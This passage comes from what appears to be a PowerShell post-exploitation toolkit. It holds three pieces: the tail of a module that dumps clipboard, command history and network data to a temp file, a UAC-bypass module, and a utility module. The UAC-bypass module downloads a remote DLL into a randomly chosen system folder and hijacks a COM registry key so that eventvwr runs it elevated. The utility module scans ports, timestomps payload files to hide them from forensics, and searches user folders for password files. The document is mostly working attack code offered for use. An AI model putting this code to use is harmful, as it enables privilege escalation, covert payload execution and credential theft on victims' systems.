out-file $env:temp\sysinfo.txt -Append) 453 | (Invoke-Sysinfo -LangMode | out-file $env:temp\sysinfo.txt -Append) 454 | (Invoke-Sysinfo -PsVersion | out-file $env:temp\sysinfo.txt -Append) 455 | (Invoke-Sysinfo -DnsCache | out-file $env:temp\sysinfo.txt -Append) 456 | (Invoke-Sysinfo -PsHistory | out-file $env:temp\sysinfo.txt -Append) 457 | (Invoke-Sysinfo -ClipBoard | out-file $env:temp\sysinfo.txt -Append) 458 | (Invoke-Sysinfo -RecentDocs | out-file $env:temp\sysinfo.txt -Append) 459 | (Invoke-Sysinfo -IpConfig | out-file $env:temp\sysinfo.txt -Append) 460 | (Invoke-Sysinfo -NetStat | out-file $env:temp\sysinfo.txt -Append) 461 | (Invoke-Sysinfo -IEFavorites | out-file $env:temp\sysinfo.txt -Append) 462 | 463 | Write "All modules dumped to $env:temp\sysinfo.txt" 464 | $h 465 | } 466 | } -------------------------------------------------------------------------------- /modules/Invoke-UACBypass.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-UACBypass { 2 | <# 3 | 4 | .SYNOPSIS 5 | UAC Bypass 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER MMCCom 14 | Downloads a remotely hosted DLL payload and executes a UAC bypass using CLSID 0A29FF9E-7F9C-4437-8B11-F424491E3931 "InProcServer"Event Viewer (mmc.exe) Method. Requires Admin User with UAC set to "Default". (Win 10.0.16299) 15 | 16 | .EXAMPLE 17 | PS> Invoke-UACBypass -MMCCom -RemoteDll https://srv/file.dll 18 | 19 | .NOTES 20 | Author: Fabrizio Siciliano (@0rbz_) 21 | 22 | #> 23 | 24 | [CmdletBinding()] 25 | param ( 26 | [Parameter(Position=1)] 27 | [Switch]$Help, 28 | [switch]$List, 29 | 30 | [Parameter(Mandatory = $False)] 31 | [Switch]$MMCCom, 32 | [String]$RemoteDll 33 | ) 34 | 35 | $Rs1 = (-join ((65..90) + (97..122) | Get-Random -Count 5 | foreach {[char]$_})) 36 | 37 | $DataDirs = @( 38 | ("C:\ProgramData\Intel"), 39 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 40 | ("C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys"), 41 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 42 | ("C:\ProgramData\Microsoft\Diagnosis"), 43 | ("C:\ProgramData\Microsoft\Diagnosis\FeedbackHub"), 44 | ("C:\ProgramData\Microsoft\Diagnosis\Scripts"), 45 | ("C:\ProgramData\Microsoft\Network\Downloader"), 46 | ("C:\ProgramData\Microsoft\Office\Heartbeat"), 47 | ("C:\ProgramData\Microsoft\Search\Data"), 48 | ("C:\ProgramData\Microsoft\Search\Data\Applications"), 49 | ("C:\ProgramData\Microsoft\Search\Data\Temp"), 50 | ("C:\ProgramData\Microsoft\Windows\WER\ReportArchive"), 51 | ("C:\ProgramData\Microsoft\Windows\WER\ReportQueue"), 52 | ("C:\ProgramData\Microsoft\Windows\WER\Temp"), 53 | ("C:\ProgramData\WindowsHolographicDevices"), 54 | ("C:\Users\Public\Libraries"), 55 | ("C:\Users\Public\AccountPictures"), 56 | ("C:\Users\Public\Documents"), 57 | ("C:\Users\Public\Downloads"), 58 | ("C:\Users\Public\Music"), 59 | ("C:\Users\Public\Pictures"), 60 | ("C:\Users\Public\Videos"), 61 | ("C:\Users\Public\Roaming"), 62 | ("C:\Windows\debug\WIA"), 63 | ("C:\Windows\ServiceProfiles\LocalService"), 64 | ("C:\Windows\ServiceProfiles\LocalService\AppData"), 65 | ("C:\Windows\ServiceProfiles\LocalService\AppData\Local"), 66 | ("C:\Windows\ServiceProfiles\LocalService\AppData\LocalLow"), 67 | ("C:\Windows\Temp"), 68 | ("C:\windows\system32\config"), 69 | ("C:\Windows\System32\LogFiles\WMI"), 70 | ("C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys") 71 | ) 72 | 73 | # create a new array from the list above of whose existence is true on the target system. 74 | $NewArray = foreach ($datadir in $datadirs) { 75 | if (Test-Path $datadir) { 76 | @($datadir) 77 | } 78 | } 79 | $datadir = ($newarray[(get-random -Maximum ([array]$newarray).count)]) 80 | 81 | if ($Help -eq $True) { 82 | 83 | Write @" 84 | 85 | ### Invoke-UACBypass Help ### 86 | ----------------------------- 87 | Available Invoke-UACBypass Commands: 88 | ------------------------------------ 89 | |-----------------------------------------------------------------------------| 90 | | -MMCCom [-RemoteDll] remote_dll | 91 | |-----------------------------------------------------------------------------| 92 | 93 | [?] Description: Downloads a remotely hosted DLL payload and executes a UAC 94 | bypass using CLSID 0A29FF9E-7F9C-4437-8B11-F424491E3931 "InProcServer" 95 | Event Viewer (mmc.exe) Method. Requires Admin User with UAC set to 96 | "Default". (Win 10.0.16299) 97 | 98 | [?] Usage: Invoke-UACBypass -MMCCom -RemoteDll https://srv/file.dll 99 | 100 | \-----------------------------------------------------------------------------/ 101 | 102 | "@ 103 | } 104 | elseif ($List -eq $True) { 105 | Write @" 106 | 107 | Invoke-UACBypass Brief Command Usage: 108 | ------------------------------------- 109 | Invoke-UACBypass -MMCCom -RemoteDll https://srv/file.dll 110 | 111 | "@ 112 | } 113 | 114 | elseif ($MMCCom -and $RemoteDll) { 115 | 116 | if ($PSVersionTable.PSVersion.Major -eq "2") { 117 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 118 | return 119 | } 120 | 121 | # https://twitter.com/UnaPibaGeek/status/1067777096955674625 122 | $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin 123 | 124 | $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop 125 | 126 | if ($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1) { 127 | Write "`n [!] UAC is set to 'Always Notify', Can't bypass with this settings. Requires 'Default' UAC setting.`n" 128 | Return 129 | } 130 | else { 131 | 132 | $ClsidRegPath = "HKCU:\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InProcServer32" 133 | $ValName = "(Default)" 134 | 135 | # download the dll into a random directory and a randomized file name. 136 | 137 | $LocalDll = "$DataDir\$Rs1.dll" 138 | 139 | $dl = New-Object System.Net.WebClient 140 | $dl.headers.add("User-Agent", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5") 141 | $dl.downloadfile("$RemoteDll", "$LocalDll") 142 | 143 | $RegValue = $LocalDll 144 | New-Item -Path $ClsidRegPath -Force | Out-Null 145 | New-ItemProperty -Path $ClsidRegPath -Name $ValName -Value $RegValue | Out-Null 146 | 147 | $Command = "$env:windir\system32\eventvwr.msc /s" 148 | Start-Job -Name "MMCCom" -ScriptBlock {Invoke-Expression $Command} 149 | Stop-Job -Name "MMCCom" 150 | Sleep 4 151 | Remove-Item -Path $ClsidRegPath -Force -ErrorAction SilentlyContinue | Out-Null 152 | } 153 | } 154 | } -------------------------------------------------------------------------------- /modules/Invoke-Utility.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Utility { 2 | <# 3 | 4 | .SYNOPSIS 5 | 6 | Miscellaneous Utilities. 7 | 8 | .PARAMETER Help 9 | 10 | Shows detailed help for each function. 11 | 12 | .PARAMETER List 13 | 14 | Shows brief command usage list. 15 | 16 | 17 | .PARAMETER TcpScan 18 | 19 | A Simple TCP Port Scanner. 20 | 21 | .PARAMETER TimeStomp 22 | 23 | Modifies a files' Creation Time to that of C:\windows\system32\cmd.exe. The 'TimeOf' parameter can be used to change the timestamp to match that of some other file. 24 | 25 | .PARAMETER FindFile 26 | 27 | Search for a file. 28 | 29 | .EXAMPLE 30 | 31 | Invoke-Utility -TcpScan -IpAddress 192.168.0.1 -Ports 80,443,3389,22,445 32 | 33 | .EXAMPLE 34 | 35 | (Time Stomps C:\payload.exe to match C:\windows\system32\cmd.exe) 36 | Invoke-Utility -TimeStomp -File C:\payload.exe 37 | 38 | (Time Stomps C:\payload.exe to match C:\Users\user\Documents\foo.doc) 39 | Invoke-Utility -TimeStomp -File C:\payload.exe -TimeOf C:\Users\user\Documents\foo.doc 40 | 41 | 42 | .EXAMPLE 43 | 44 | Invoke-Utility -FindFile -File passwords.doc -Path C:\Users 45 | Invoke-Utility -FindFile -File passwords* -Path C:\Users 46 | 47 | .NOTES 48 | 49 | Author: Fabrizio Siciliano (@0rbz_) 50 | 51 | #> 52 | [CmdletBinding()] 53 | param ( 54 | 55 | [Parameter(Position=1)] 56 | [Switch]$Help, 57 | [Switch]$List, 58 | 59 | [Parameter(Mandatory = $False)] 60 | [Switch]$TcpScan, 61 | [String]$IpAddress, 62 | $Ports, 63 | [Switch]$Force, 64 | 65 | [Parameter(Mandatory = $False)] 66 | [Switch]$TimeStomp, 67 | [String]$File, 68 | [String]$TimeOf, 69 | 70 | [Parameter(Mandatory = $False)] 71 | [Switch]$FindFile, 72 | [string]$File2=[string]$File, 73 | [String]$Path 74 | 75 | ) 76 | 77 | $DataDirs = @( 78 | ("C:\ProgramData\Intel"), 79 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 80 | ("C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys"), 81 | ("C:\ProgramData\Microsoft\Crypto\SystemKeys"), 82 | ("C:\ProgramData\Microsoft\Diagnosis"), 83 | ("C:\ProgramData\Microsoft\Diagnosis\FeedbackHub"), 84 | ("C:\ProgramData\Microsoft\Diagnosis\Scripts"), 85 | ("C:\ProgramData\Microsoft\Network\Downloader"), 86 | ("C:\ProgramData\Microsoft\Office\Heartbeat"), 87 | ("C:\ProgramData\Microsoft\Search\Data"), 88 | ("C:\ProgramData\Microsoft\Search\Data\Applications"), 89 | ("C:\ProgramData\Microsoft\Search\Data\Temp"), 90 | ("C:\ProgramData\WindowsHolographicDevices"), 91 | ("C:\Users\Public\Libraries"), 92 | ("C:\Users\Public\AccountPictures"), 93 | ("C:\Users\Public\Documents"), 94 | ("C:\Users\Public\Downloads"), 95 | ("C:\Users\Public\Music"), 96 | ("C:\Users\Public\Pictures"), 97 | ("C:\Users\Public\Videos"), 98 | ("C:\Users\Public\Roaming"), 99 | ("C:\Windows\debug\WIA"), 100 | ("C:\Windows\ServiceProfiles\LocalService"), 101 | ("C:\Windows\ServiceProfiles\LocalService\AppData"), 102 | ("C:\Windows\ServiceProfiles\LocalService\AppData\Local"), 103 | ("C:\Windows\ServiceProfiles\LocalService\AppData\LocalLow"), 104 | ("C:\Windows\Temp"), 105 | ("C:\windows\system32\config"), 106 | ("C:\Windows\System32\LogFiles\WMI"), 107 | ("C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys") 108 | ) 109 | 110 | $NewArray = foreach ($datadir in $datadirs) { 111 | if (Test-Path $datadir) { 112 | @($datadir) 113 | } 114 | } 115 | $datadir = ($newarray[(get-random -Maximum ([array]$newarray).count)]) 116 | 117 | 118 | 119 | if ($Help) { 120 | Write @" 121 | 122 | ### Invoke-Utility Help ### 123 | -------------------------------- 124 | Available Invoke-Utility Commands: 125 | -------------------------------- 126 | |---------------------------------------------------------------------| 127 | | -TcpScan [-IpAddress] ip_address [-Ports] ports [-Force] | 128 | |---------------------------------------------------------------------| 129 | 130 | [*] Description: Simple TCP Port Scanner. 131 | 132 | [*] Usage: Invoke-Utility -TcpScan -IpAddress 192.168.0.1 -Ports 80,443,8080 133 | [*] Usage: Invoke-Utility -TcpScan -IpAddress 192.168.0.1 -Ports 80,443,8080 -Force 134 | (Will attempt to scan the host in the case ICMP echo request is blocked.) 135 | 136 | [*] Mitre ATT&CK Ref: T1423 (Network Service Scanning) 137 | 138 | |----------------------------------------------------------------------| 139 | | -TimeStomp [-File] file.exe [-TimeOf] someotherfile.exe | 140 | |----------------------------------------------------------------------| 141 | 142 | [*] Description: Modifies a files' Creation Time to that of 143 | C:\windows\system32\cmd.exe. The 'TimeOf' parameter can be used 144 | to change the timestamp to match that of some other file. 145 | 146 | [*] Usage: Invoke-Utility -TimeStomp -File C:\temp\file.exe 147 | [*] Usage: Invoke-Utility -TimeStomp -File C:\temp\file.exe -TimeOf C:\windows\system32\calc.exe 148 | 149 | [*] Mitre ATT&CK Ref: T1099 (Timestomp) 150 | 151 | |----------------------------------------------------------------------| 152 | | -FindFile -File file.txt -Path path | 153 | |----------------------------------------------------------------------| 154 | 155 | [*] Description: Search for a file. 156 | 157 | [*] Usage: Invoke-Utility -FindFile -File passwords.xls -Path C:\Users 158 | 159 | \---------------------------------------------------------------------/ 160 | 161 | "@ 162 | } 163 | elseif ($List) { 164 | Write @" 165 | 166 | Invoke-Utility Brief Command Usage: 167 | ----------------------------------- 168 | Invoke-Utility -TcpScan -IpAddress 192.168.0.1 -Ports 80,443,8080 169 | Invoke-Utility -TimeStomp -File C:\temp\file.exe 170 | Invoke-Utility -TimeStomp -File C:\temp\file.exe -TimeOf C:\windows\system32\calc.exe 171 | Invoke-Utility -FindFile -File passwords.xls -Path C:\Users 172 | 173 | "@ 174 | } 175 | elseif ($TCPScan -and $IpAddress) { 176 | 177 | if ($PSVersionTable.PSVersion.Major -eq "2") { 178 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 179 | return 180 | } 181 | if ($(Test-Connection -Quiet -Count 1 $IpAddress)) { 182 | 183 | foreach ($Port in $Ports) { 184 | 185 | $TcpClient = New-Object System.Net.Sockets.TcpClient 186 | $Connect = $TcpClient.BeginConnect($IpAddress, $Port, $Null, $Null) 187 | $TimeOut = $Connect.AsyncWaitHandle.WaitOne(5, $True) 188 | 189 | if (!$TimeOut) { 190 | $TcpClient.Close() 191 | sleep 1 192 | } 193 | else { 194 | Write "Open: $Port" 195 | $TcpClient.Close() 196 | sleep 1 197 | } 198 | } 199 | } 200 | else { 201 | Write "Host appears offline." 202 | } 203 | } 204 | elseif ($TCPScan -and $IpAddress -and $Force) { 205 | if ($PSVersionTable.PSVersion.Major -eq "2") { 206 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 207 | return 208 | } 209 | if (!$(Test-Connection -Quiet -Count 1 $IpAddress)) { 210 | 211 | foreach ($Port in $Ports) { 212 | 213 | $TcpClient = New-Object System.Net.Sockets.TcpClient 214 | $Connect = $TcpClient.BeginConnect($IpAddress, $Port, $Null, $Null) 215 | $TimeOut = $Connect.AsyncWaitHandle.WaitOne(5, $True) 216 | 217 | if (!$TimeOut) { 218 | $TcpClient.Close() 219 | sleep 1 220 | } 221 | else { 222 | Write "Open: $Port" 223 | $TcpClient.Close() 224 | sleep 1 225 | } 226 | } 227 | } 228 | } 229 | elseif ($TimeStomp -and $File -and $TimeOf) { 230 | 231 | $TimeSource = (Get-Item $TimeOf).FullName 232 | [IO.File]::SetCreationTime("$File", [IO.File]::GetCreationTime($TimeSource)) 233 | [IO.File]::SetLastAccessTime("$File", [IO.File]::GetLastAccessTime($TimeSource)) 234 | [IO.File]::SetLastWriteTIme("$File", [IO.File]::GetLastWriteTime($TimeSource)) 235 | 236 | Write " `n[+] Changed Creation, Last Access, and Last Write Time for $File`:" 237 | (Get-Item $File) 238 | } 239 | elseif ($TimeStomp -and $File -and !$TimeOf) { 240 | 241 | [IO.File]::SetCreationTime("$File", [IO.File]::GetCreationTime($TimeSource)) 242 | [IO.File]::SetLastAccessTime("$File", [IO.File]::GetLastAccessTime($TimeSource)) 243 | [IO.File]::SetLastWriteTIme("$File", [IO.File]::GetLastWriteTime($TimeSource)) 244 | 245 | Write " `n[+] Changed Creation, Last Access, and Last Write Time for $File`:" 246 | (Get-Item $File) 247 | } 248 | elseif ($FindFile -and $File -and $Path) { 249 | 250 | Get-ChildItem -Path $Path -Filter $File -Recurse -ErrorAction SilentlyContinue -Force 251 | } 252 | } --------------------------------------------------------------------------------